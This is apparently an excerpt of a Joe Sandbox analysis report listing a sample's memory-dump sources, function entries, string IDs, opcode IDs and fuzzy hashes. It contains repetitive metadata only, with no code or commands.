                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6<X$Kv_
                                • API String ID: 0-2771333070
                                • Opcode ID: af1563c90fd8314eca6074b5f6f1f5e70953b0afd3fda17ea4d4dd0e68afcc1a
                                • Instruction ID: c985263e87d7bc8598266a0842f816c0f500a1b339e53d441c8b735441833bbf
                                • Opcode Fuzzy Hash: af1563c90fd8314eca6074b5f6f1f5e70953b0afd3fda17ea4d4dd0e68afcc1a
                                • Instruction Fuzzy Hash: C3B206F3A0C2049FE304AE2DEC8567AF7E5EF94720F1A453DEAC5C7744EA3558018696
                                Function 0111FF6D Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Txov$g;_^
                                • API String ID: 0-502869318
                                • Opcode ID: 7f6ac7d9d47fba336cfd013dd7d4d4c2c9eed1d139bc4098d8772b2350b6a343
                                • Instruction ID: 5922656613871357f2d589786ed89e2e040da99ff0c28d2e013834ec303c2b7e
                                • Opcode Fuzzy Hash: 7f6ac7d9d47fba336cfd013dd7d4d4c2c9eed1d139bc4098d8772b2350b6a343
                                • Instruction Fuzzy Hash: E041E7F3E091105BF344EA2ADC4472ABBD7DBD4310F2AC539DA84D3788E93958054696
                                Function 0104F8BA Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >nn
                                • API String ID: 0-1423885210
                                • Opcode ID: 88c1f6d3dd5ed8729293b01341b3470850654cbdedc80cb06096a82469eb84b7
                                • Instruction ID: 903b02ce03b0ebec473fccfc91f3357d755936dce93799ef7690614d613bbab9
                                • Opcode Fuzzy Hash: 88c1f6d3dd5ed8729293b01341b3470850654cbdedc80cb06096a82469eb84b7
                                • Instruction Fuzzy Hash: F47106B39087109FE304AE6DDCC976ABBE5EF98320F1A8A3DEAC4D7744D57458058782
                                Function 01140101 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: cRf%
                                • API String ID: 0-525100361
                                • Opcode ID: f06ad5dc02c1b6512d4a4d1d60b4605cf58d800b4ff00a95c1cbeb0549346c45
                                • Instruction ID: c3acedac9503a5c9a7adac7b325b43837bfc1e80f058a66b72d339a2cf22e415
                                • Opcode Fuzzy Hash: f06ad5dc02c1b6512d4a4d1d60b4605cf58d800b4ff00a95c1cbeb0549346c45
                                • Instruction Fuzzy Hash: BB61F7F3E082105FF3189E19EC9577AB7D5EF98320F1A453DEA8887380E97A5C018796
                                Function 0118F7FF Relevance: .5, Instructions: 515COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 603dcc3aacc174a3ee9c1c32c58bb87e96483543e41b69c5094519d0efa1325b
                                • Instruction ID: 54f2345902f80fd3fe3fb5ef437b55040fe006bd75460dcfeaaf784bf2db2928
                                • Opcode Fuzzy Hash: 603dcc3aacc174a3ee9c1c32c58bb87e96483543e41b69c5094519d0efa1325b
                                • Instruction Fuzzy Hash: 9AF1F2F390C200AFD309BF29DC4567ABBE5EF94320F1A892DE6C587744E67558418B87
                                Function 01054144 Relevance: .2, Instructions: 211COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f156a42bdc0bfa7a884316a458786ba0f773e0af1b481d8574014ff7df72833
                                • Instruction ID: a4331662b84b4702543f41fd0ffa4887db24fe1f2f251b93250d6bb44f28a40f
                                • Opcode Fuzzy Hash: 7f156a42bdc0bfa7a884316a458786ba0f773e0af1b481d8574014ff7df72833
                                • Instruction Fuzzy Hash: 16513AF3B083045BF3089E2AED4577AB7D6DBD4320F16C63DEA8487748F93958064696
                                Function 0120F7D4 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52cf6d7a67774c00cd2821adad06e1551d407828f62677339e25d05af8e7bc18
                                • Instruction ID: 7c49ab0a2d696ff7abe6e4b7bd996ed44cbcfb00e8204164a2325986205e8530
                                • Opcode Fuzzy Hash: 52cf6d7a67774c00cd2821adad06e1551d407828f62677339e25d05af8e7bc18
                                • Instruction Fuzzy Hash: 325181B35BC104FFD3265A24EE8297BB7E9DB80224F15473EE4C2C7786E5B459418292
                                Function 01060ACD Relevance: .2, Instructions: 171COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e230ef8fcfc74902728a49829ac6fbaf7fa61dd746d73bb5d5d255fc807b4be
                                • Instruction ID: 66caddecd65e553088e060615af034b8a954b73be3a3f72f8b5a9e6a6a047607
                                • Opcode Fuzzy Hash: 9e230ef8fcfc74902728a49829ac6fbaf7fa61dd746d73bb5d5d255fc807b4be
                                • Instruction Fuzzy Hash: 0D5101B3A086145BF304AE6ADC8576BF7D6EFC4720F27863DDA9893344E978580186C6
                                Function 0127278A Relevance: .2, Instructions: 162COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e7e259d74e865731ef8dedb9f3057aedc88d95528333bf4bc17b3b14c1977d8
                                • Instruction ID: 9566f74892cbba4b98c347af5a11a9217b737104a303e409fc81be220ddd5fa6
                                • Opcode Fuzzy Hash: 6e7e259d74e865731ef8dedb9f3057aedc88d95528333bf4bc17b3b14c1977d8
                                • Instruction Fuzzy Hash: DF4104B393C214DFD3086E15DD5357BF7E9EF90710F16882EE2C696600EBB154818A93
                                Function 010C9C12 Relevance: .2, Instructions: 159COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a578d1869bb3e86f423de804c2639d17bad437e931b16ad538fe4df2cd7d52a
                                • Instruction ID: 163cc17264469f9f2418f47711be149ba8ef0ca47f95c3f2e30adf3761252343
                                • Opcode Fuzzy Hash: 8a578d1869bb3e86f423de804c2639d17bad437e931b16ad538fe4df2cd7d52a
                                • Instruction Fuzzy Hash: 92418BF3A483046FF344AA3DEC85A7BB7E9EB98310F59853EE4C4C3744E97489058262
                                Function 0117355A Relevance: .1, Instructions: 148COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6862dd8a0de288cdde0bb71147655b4769b656634a934073960db0bba20ef98f
                                • Instruction ID: a0f850388f997659a1c37cef04a0e6925e45fd25a75f2526ccfa3c5a27d2b34c
                                • Opcode Fuzzy Hash: 6862dd8a0de288cdde0bb71147655b4769b656634a934073960db0bba20ef98f
                                • Instruction Fuzzy Hash: 8541B1B3A482109BE3407E29DD8576AB7E9EFD4720F1A483DE6C4C7780D67498418B83
                                Function 0105DAB2 Relevance: .1, Instructions: 128COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 01ec1590aecd5e5feeadf9fda3426e83cf572e6fa55dfb96edca9fdefacadc76
                                • Instruction ID: beb327cb6c89f83729d736d4ebcc86d97489809619d68c24ede3eea9c2ee6312
                                • Opcode Fuzzy Hash: 01ec1590aecd5e5feeadf9fda3426e83cf572e6fa55dfb96edca9fdefacadc76
                                • Instruction Fuzzy Hash: 9E41C7F35182049FE3056E38DC85BBBBBE5EB68320F05493DE6C4C3744E63998018656
                                Function 00DD9750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmpDownload File
